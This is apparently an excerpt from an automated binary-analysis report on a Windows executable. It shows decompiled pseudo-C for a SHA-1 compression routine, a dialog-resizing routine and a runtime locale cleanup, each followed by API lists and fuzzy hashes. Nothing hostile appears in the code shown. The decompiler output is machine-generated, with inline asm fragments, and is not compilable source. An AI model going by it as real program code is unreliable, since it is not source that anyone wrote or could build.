                					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
                				} while (_v24 != 0xf);
                				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
                				asm("rol edx, 1");
                				asm("rol ecx, 0x5");
                				 *_t839 = _t769;
                				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
                				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
                				_a16 = _t454;
                				asm("rol edx, 1");
                				asm("rol ecx, 0x5");
                				asm("ror ebx, 0x2");
                				_t839[1] = _t773;
                				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
                				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
                				asm("ror esi, 0x2");
                				_a8 = _t460;
                				asm("rol edx, 1");
                				asm("rol ecx, 0x5");
                				_t839[2] = _t777;
                				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
                				_t887 = _a16;
                				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
                				_v28 = _t466;
                				asm("ror ebp, 0x2");
                				_a16 = _t887;
                				_t888 = _a8;
                				asm("rol edx, 1");
                				asm("rol ecx, 0x5");
                				_t839[3] = _t781;
                				asm("ror ebp, 0x2");
                				_t782 = 0x11;
                				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
                				_a8 = _t888;
                				_v16 = _t782;
                				do {
                					_t89 = _t782 + 5; // 0x16
                					_t474 = _t89;
                					_v8 = _t474;
                					_t91 = _t782 - 5; // 0xc
                					_t92 = _t782 + 3; // 0x14
                					_t890 = _t92 & 0x0000000f;
                					_t595 = _t474 & 0x0000000f;
                					_v12 = _t890;
                					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
                					asm("rol edx, 1");
                					_t839[_t890] = _t786;
                					_t891 = _v28;
                					asm("rol ecx, 0x5");
                					asm("ror ebp, 0x2");
                					_v28 = _t891;
                					_t482 = _v16;
                					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
                					_t854 = _v20;
                					_t787 = 0xf;
                					_t841 = _t482 + 0x00000006 & _t787;
                					_t893 = _t482 + 0x00000004 & _t787;
                					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
                					asm("rol edx, 1");
                					 *(_t854 + _t893 * 4) = _t791;
                					_t855 = _a12;
                					asm("rol ecx, 0x5");
                					asm("ror esi, 0x2");
                					_a12 = _t855;
                					_t489 = _v16;
                					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
                					_t857 = _t489 + 0x00000007 & 0x0000000f;
                					_t670 = _v20;
                					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
                					asm("rol edx, 1");
                					 *(_t670 + _t595 * 4) = _t796;
                					_t596 = _v24;
                					asm("rol ecx, 0x5");
                					asm("ror ebx, 0x2");
                					_v24 = _t596;
                					_t597 = _v20;
                					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
                					asm("rol ecx, 0x5");
                					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
                					asm("rol edx, 1");
                					 *(_t597 + _t841 * 4) = _t800;
                					_t598 = _a16;
                					_t839 = _v20;
                					asm("ror ebx, 0x2");
                					_a16 = _t598;
                					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
                					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
                					_t894 = _a8;
                					asm("rol edx, 1");
                					_t839[_t857] = _t804;
                					_t851 = _v24;
                					asm("rol ecx, 0x5");
                					_t782 = _v8;
                					asm("ror ebp, 0x2");
                					_a8 = _t894;
                					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
                					_v16 = _t782;
                				} while (_t782 + 3 <= 0x23);
                				_t858 = 0x25;
                				_v16 = _t858;
                				while(1) {
                					_t199 = _t858 + 5; // 0x2a
                					_t512 = _t199;
                					_t200 = _t858 - 5; // 0x20
                					_v4 = _t512;
                					_t202 = _t858 + 3; // 0x28
                					_t806 = _t202 & 0x0000000f;
                					_v8 = _t806;
                					_t896 = _t512 & 0x0000000f;
                					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
                					asm("rol esi, 1");
                					_t599 = _v28;
                					_t839[_t806] = _t862;
                					asm("rol edx, 0x5");
                					asm("ror ebx, 0x2");
                					_t863 = 0xf;
                					_v28 = _t599;
                					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
                					_t519 = _v16;
                					_t601 = _t519 + 0x00000006 & _t863;
                					_t809 = _t519 + 0x00000004 & _t863;
                					_v12 = _t809;
                					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
                					asm("rol esi, 1");
                					_t839[_t809] = _t867;
                					_t842 = _a12;
                					_t810 = _v24;
                					asm("rol edx, 0x5");
                					asm("ror edi, 0x2");
                					_a12 = _t842;
                					_t243 = _t810 - 0x70e44324; // -1894007573
                					_t811 = _v20;
                					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
                					_t526 = _v16;
                					_t844 = _t526 + 0x00000007 & 0x0000000f;
                					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
                					asm("rol esi, 1");
                					 *(_t811 + _t896 * 4) = _t871;
                					_t897 = _v24;
                					asm("rol edx, 0x5");
                					asm("ror ebp, 0x2");
                					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
                					_v24 = _t897;
                					_t898 = _v20;
                					_a8 = _t814;
                					asm("rol edx, 0x5");
                					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
                					asm("rol esi, 1");
                					 *(_t898 + _t601 * 4) = _t875;
                					_t598 = _a16;
                					asm("ror ebx, 0x2");
                					_a16 = _t598;
                					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
                					_v28 = _t815;
                					asm("rol edx, 0x5");
                					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
                					asm("rol esi, 1");
                					 *(_t898 + _t844 * 4) = _t879;
                					_t899 = _a8;
                					_t845 = _v24;
                					asm("ror ebp, 0x2");
                					_a8 = _t899;
                					_t858 = _v4;
                					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
                					_v16 = _t858;
                					if(_t858 + 3 > 0x37) {
                						break;
                					}
                					_t839 = _v20;
                				}
                				_t816 = 0x39;
                				_v16 = _t816;
                				do {
                					_t310 = _t816 + 5; // 0x3e
                					_t546 = _t310;
                					_v8 = _t546;
                					_t312 = _t816 + 3; // 0x3c
                					_t313 = _t816 - 5; // 0x34
                					_t880 = 0xf;
                					_t901 = _t312 & _t880;
                					_t603 = _t546 & _t880;
                					_t881 = _v20;
                					_v4 = _t901;
                					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
                					asm("rol edx, 1");
                					 *(_t881 + _t901 * 4) = _t820;
                					_t902 = _v28;
                					asm("rol ecx, 0x5");
                					asm("ror ebp, 0x2");
                					_v28 = _t902;
                					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
                					_t555 = _v16;
                					_t821 = 0xf;
                					_t847 = _t555 + 0x00000006 & _t821;
                					_t904 = _t555 + 0x00000004 & _t821;
                					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
                					asm("rol edx, 1");
                					 *(_t881 + _t904 * 4) = _t825;
                					_t882 = _a12;
                					asm("rol ecx, 0x5");
                					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
                					_t564 = _v16;
                					asm("ror esi, 0x2");
                					_a12 = _t882;
                					_t884 = _t564 + 0x00000007 & 0x0000000f;
                					_t741 = _v20;
                					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
                					asm("rol edx, 1");
                					 *(_t741 + _t603 * 4) = _t830;
                					_t604 = _v24;
                					asm("rol ecx, 0x5");
                					asm("ror ebx, 0x2");
                					_v24 = _t604;
                					_t605 = _v20;
                					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
                					asm("rol ecx, 0x5");
                					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
                					asm("rol edx, 1");
                					_t605[_t847] = _t834;
                					_t845 = _v24;
                					asm("ror dword [esp+0x3c], 0x2");
                					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
                					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
                					_t905 = _a8;
                					asm("rol edx, 1");
                					_t605[_t884] = _t838;
                					_t606 = _a16;
                					_t885 = _v28;
                					asm("ror ebp, 0x2");
                					_t816 = _v8;
                					asm("rol ecx, 0x5");
                					_a8 = _t905;
                					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
                					_v16 = _t816;
                					_a12 = _t752;
                				} while (_t816 + 3 <= 0x4b);
                				_t592 = _a4;
                				_t592[1] = _t592[1] + _t885;
                				_t592[2] = _t592[2] + _t905;
                				_t592[3] = _t592[3] + _t606;
                				 *_t592 =  *_t592 + _t752;
                				_t592[4] = _t592[4] + _t845;
                				return _t592;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                • Instruction ID: a2939deb62a2cc7ece77bc70aad074405e9257bb5501ce8b956a79947bb079fa
                • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                • Instruction Fuzzy Hash: 055248B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D334E919CB82
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00CAD70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
                				struct HWND__* _v8;
                				short _v2048;
                				char _v2208;
                				char _v2288;
                				signed int _v2292;
                				char _v2300;
                				intOrPtr _v2304;
                				struct tagRECT _v2320;
                				intOrPtr _v2324;
                				intOrPtr _v2336;
                				struct tagRECT _v2352;
                				struct tagRECT _v2368;
                				signed int _v2376;
                				char _v2377;
                				intOrPtr _v2384;
                				intOrPtr _v2393;
                				void* __ebx;
                				void* __esi;
                				signed int _t96;
                				signed int _t104;
                				struct HWND__* _t106;
                				signed int _t119;
                				signed int _t134;
                				void* _t150;
                				void* _t155;
                				char _t156;
                				void* _t157;
                				signed int _t158;
                				intOrPtr _t160;
                				void* _t163;
                				void* _t169;
                				long _t170;
                				signed int _t174;
                				signed int _t185;
                				struct HWND__* _t186;
                				struct HWND__* _t187;
                				void* _t188;
                				void* _t191;
                				signed int _t192;
                				long _t193;
                				void* _t200;
                				int* _t201;
                				struct HWND__* _t202;
                				void* _t204;
                				void* _t205;
                				void* _t207;
                				void* _t209;
                				void* _t213;
                
                				_t202 = __ecx;
                				_v2368.bottom = __ecx;
                				E00CA3E41( &_v2208, 0x50, L"$%s:", _a8);
                				_t207 =  &_v2368 + 0x10;
                				E00CB11FA( &_v2208,  &_v2288, 0x50);
                				_t96 = E00CC2BB0( &_v2300);
                				_t186 = _v8;
                				_t155 = 0;
                				_v2376 = _t96;
                				_t209 =  *0xcdd5f4 - _t155; // 0x63
                				if(_t209 <= 0) {
                					L8:
                					_t156 = E00CACD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
                					_v2377 = _t156;
                					GetWindowRect(_t186,  &_v2352);
                					GetClientRect(_t186,  &(_v2320.top));
                					_t169 = _v2352.right - _v2352.left + 1;
                					_t104 = _v2320.bottom;
                					_t191 = _v2352.bottom - _v2352.top + 1;
                					_v2368.right = 0x64;
                					_t204 = _t191 - _v2304;
                					_v2368.bottom = _t169 - _t104;
                					if(_t156 == 0) {
                						L15:
                						_t221 = _a12;
                						if(_a12 == 0 && E00CACE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
                							SetWindowTextW(_t186,  &_v2048);
                						}
                						L18:
                						_t205 = _t204 - GetSystemMetrics(8);
                						_t106 = GetWindow(_t186, 5);
                						_t187 = _t106;
                						_v2368.bottom = _t187;
                						if(_t156 == 0) {
                							L24:
                							return _t106;
                						}
                						_t157 = 0;
                						while(_t187 != 0) {
                							__eflags = _t157 - 0x200;
                							if(_t157 >= 0x200) {
                								goto L24;
                							}
                							GetWindowRect(_t187,  &_v2320);
                							_t170 = _v2320.top.left;
                							_t192 = 0x64;
                							asm("cdq");
                							_t193 = _v2320.left;
                							asm("cdq");
                							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
                							asm("cdq");
                							_t174 = 0x64;
                							asm("cdq");
                							asm("cdq");
                							 *0xcddfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
                							_t106 = GetWindow(_t187, 2);
                							_t187 = _t106;
                							__eflags = _t187 - _v2384;
                							if(_t187 == _v2384) {
                								goto L24;
                							}
                							_t157 = _t157 + 1;
                							__eflags = _t157;
                						}
                						goto L24;
                					}
                					if(_a12 != 0) {
                						goto L18;
                					}
                					_t158 = 0x64;
                					asm("cdq");
                					_t134 = _v2292 * _v2368.top;
                					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
                					_v2324 = _t160;
                					asm("cdq");
                					_t185 = _t134 % _v2352.top;
                					_v2352.left = _t134 / _v2352.top + _t204;
                					asm("cdq");
                					asm("cdq");
                					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
                					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
                					if(_t163 < 0) {
                						_t163 = 0;
                					}
                					if(_t200 < 0) {
                						_t200 = 0;
                					}
                					 *0xcddfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
                					GetWindowRect(_t186,  &_v2368);
                					_t156 = _v2393;
                					goto L15;
                				} else {
                					_t201 = 0xcdd154;
                					do {
                						if( *_t201 > 0) {
                							_t9 =  &(_t201[1]); // 0xcd33e0
                							_t150 = E00CC5460( &_v2288,  *_t9, _t96);
                							_t207 = _t207 + 0xc;
                							if(_t150 == 0) {
                								_t12 =  &(_t201[1]); // 0xcd33e0
                								if(E00CACF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
                									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
                								}
                							}
                							_t96 = _v2368.top;
                						}
                						_t155 = _t155 + 1;
                						_t201 =  &(_t201[3]);
                						_t213 = _t155 -  *0xcdd5f4; // 0x63
                					} while (_t213 < 0);
                					goto L8;
                				}
                			}

                APIs
                • _swprintf.LIBCMT ref: 00CAD731
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                  • Part of subcall function 00CB11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CE0078,?,00CACE91,00000000,?,00000050,00CE0078), ref: 00CB1217
                • _strlen.LIBCMT ref: 00CAD752
                • SetDlgItemTextW.USER32(?,00CDD154,?), ref: 00CAD7B2
                • GetWindowRect.USER32(?,?), ref: 00CAD7EC
                • GetClientRect.USER32(?,?), ref: 00CAD7F8
                • GetWindowLongW.USER32(?,000000F0), ref: 00CAD896
                • GetWindowRect.USER32(?,?), ref: 00CAD8C3
                • SetWindowTextW.USER32(?,?), ref: 00CAD906
                • GetSystemMetrics.USER32(00000008), ref: 00CAD90E
                • GetWindow.USER32(?,00000005), ref: 00CAD919
                • GetWindowRect.USER32(00000000,?), ref: 00CAD946
                • GetWindow.USER32(00000000,00000002), ref: 00CAD9B8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$d
                • API String ID: 2407758923-2512411981
                • Opcode ID: 41e4d010908098ad1fa6160f29195840d00f8779e44ba54f7908d97da8a3c250
                • Instruction ID: 666e06c3d3676101b098c9acc5166b0c79a854246cf1ba6643b031d77e913947
                • Opcode Fuzzy Hash: 41e4d010908098ad1fa6160f29195840d00f8779e44ba54f7908d97da8a3c250
                • Instruction Fuzzy Hash: 4881B271509302AFD710DFA8DC85F6FBBE9EB89708F04091DFA96D3290D630E9058B52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CCB784(intOrPtr _a4) {
                				intOrPtr _v8;
                				intOrPtr _t25;
                				intOrPtr* _t26;
                				intOrPtr _t28;
                				intOrPtr* _t29;
                				intOrPtr* _t31;
                				intOrPtr* _t45;
                				intOrPtr* _t46;
                				intOrPtr* _t47;
                				intOrPtr* _t55;
                				intOrPtr* _t70;
                				intOrPtr _t74;
                
                				_t74 = _a4;
                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                				if(_t25 != 0 && _t25 != 0xcddd50) {
                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                					if(_t45 != 0 &&  *_t45 == 0) {
                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                						if(_t46 != 0 &&  *_t46 == 0) {
                							E00CC7A50(_t46);
                							E00CCB363( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                						if(_t47 != 0 &&  *_t47 == 0) {
                							E00CC7A50(_t47);
                							E00CCB461( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						E00CC7A50( *((intOrPtr*)(_t74 + 0x7c)));
                						E00CC7A50( *((intOrPtr*)(_t74 + 0x88)));
                					}
                				}
                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                				if(_t26 != 0 &&  *_t26 == 0) {
                					E00CC7A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                					E00CC7A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                					E00CC7A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                					E00CC7A50( *((intOrPtr*)(_t74 + 0x8c)));
                				}
                				E00CCB8F7( *((intOrPtr*)(_t74 + 0x9c)));
                				_t28 = 6;
                				_t55 = _t74 + 0xa0;
                				_v8 = _t28;
                				_t70 = _t74 + 0x28;
                				do {
                					if( *((intOrPtr*)(_t70 - 8)) != 0xcdd818) {
                						_t31 =  *_t70;
                						if(_t31 != 0 &&  *_t31 == 0) {
                							E00CC7A50(_t31);
                							E00CC7A50( *_t55);
                						}
                						_t28 = _v8;
                					}
                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                						_t29 =  *((intOrPtr*)(_t70 - 4));
                						if(_t29 != 0 &&  *_t29 == 0) {
                							E00CC7A50(_t29);
                						}
                						_t28 = _v8;
                					}
                					_t55 = _t55 + 4;
                					_t70 = _t70 + 0x10;
                					_t28 = _t28 - 1;
                					_v8 = _t28;
                				} while (_t28 != 0);
                				return E00CC7A50(_t74);
                			}

                APIs
                • ___free_lconv_mon.LIBCMT ref: 00CCB7C8
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB380
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB392
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3A4
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3B6
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3C8
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3DA
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3EC
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3FE
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB410
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB422
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB434
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB446
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB458
                • _free.LIBCMT ref: 00CCB7BD
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CCB7DF
                • _free.LIBCMT ref: 00CCB7F4
                • _free.LIBCMT ref: 00CCB7FF
                • _free.LIBCMT ref: 00CCB821
                • _free.LIBCMT ref: 00CCB834
                • _free.LIBCMT ref: 00CCB842
                • _free.LIBCMT ref: 00CCB84D
                • _free.LIBCMT ref: 00CCB885
                • _free.LIBCMT ref: 00CCB88C
                • _free.LIBCMT ref: 00CCB8A9
                • _free.LIBCMT ref: 00CCB8C1
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: e069f6a59c6e0940d823ef1e1e23406bcfa26e9e37d876fb8a196367c6b2b236
                • Instruction ID: e4483b527de8061c2912d47af0082deb96ed24bbe9c5ca2e72c6b5168f4009e0
                • Opcode Fuzzy Hash: e069f6a59c6e0940d823ef1e1e23406bcfa26e9e37d876fb8a196367c6b2b236
                • Instruction Fuzzy Hash: 08313B31A047019FEB61AABAD846F5B73E8EF40350F14652DE46AD7191DF31EE80EB24
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBC343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
                				intOrPtr _v20;
                				intOrPtr _v24;
                				void _v28;
                				short _v4124;
                				void* _t10;
                				struct HWND__* _t11;
                				void* _t21;
                				void* _t28;
                				void* _t29;
                				void* _t31;
                				struct HWND__* _t34;
                				void* _t45;
                
                				_t45 = __fp0;
                				_t29 = __edx;
                				E00CBD940();
                				_t10 = E00CB952A(__eflags);
                				if(_t10 == 0) {
                					return _t10;
                				}
                				_t11 = GetWindow(_a4, 5);
                				_t34 = _t11;
                				_t31 = 0;
                				_a4 = _t34;
                				if(_t34 == 0) {
                					L11:
                					return _t11;
                				}
                				while(_t31 < 0x200) {
                					GetClassNameW(_t34,  &_v4124, 0x800);
                					if(E00CB1410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
                						_t28 = SendMessageW(_t34, 0x173, 0, 0);
                						if(_t28 != 0) {
                							GetObjectW(_t28, 0x18,  &_v28);
                							_t21 = E00CB958C(_v20);
                							SendMessageW(_t34, 0x172, 0, E00CB975D(_t29, _t45, _t28, E00CB9549(_v24), _t21));
                							DeleteObject(_t28);
                						}
                					}
                					_t11 = GetWindow(_t34, 2);
                					_t34 = _t11;
                					if(_t34 != _a4) {
                						_t31 = _t31 + 1;
                						if(_t34 != 0) {
                							continue;
                						}
                					}
                					break;
                				}
                				goto L11;
                			}

                APIs
                • GetWindow.USER32(?,00000005), ref: 00CBC364
                • GetClassNameW.USER32(00000000,?,00000800), ref: 00CBC393
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBC3B1
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CBC3C8
                • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBC3DB
                  • Part of subcall function 00CB958C: GetDC.USER32(00000000), ref: 00CB9598
                  • Part of subcall function 00CB958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB95A7
                  • Part of subcall function 00CB958C: ReleaseDC.USER32(00000000,00000000), ref: 00CB95B5
                  • Part of subcall function 00CB9549: GetDC.USER32(00000000), ref: 00CB9555
                  • Part of subcall function 00CB9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00CB9564
                  • Part of subcall function 00CB9549: ReleaseDC.USER32(00000000,00000000), ref: 00CB9572
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CBC402
                • DeleteObject.GDI32(00000000), ref: 00CBC409
                • GetWindow.USER32(00000000,00000002), ref: 00CBC412
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 1444658586-1882779555
                • Opcode ID: 7ed5c1c0cdcd845382f34b121a7d0aeafe8252057439912e095514fe05479421
                • Instruction ID: 9f7ecc07241a4867ecbf46790c4fa0561e93cf7892679d015abe45d220b496f2
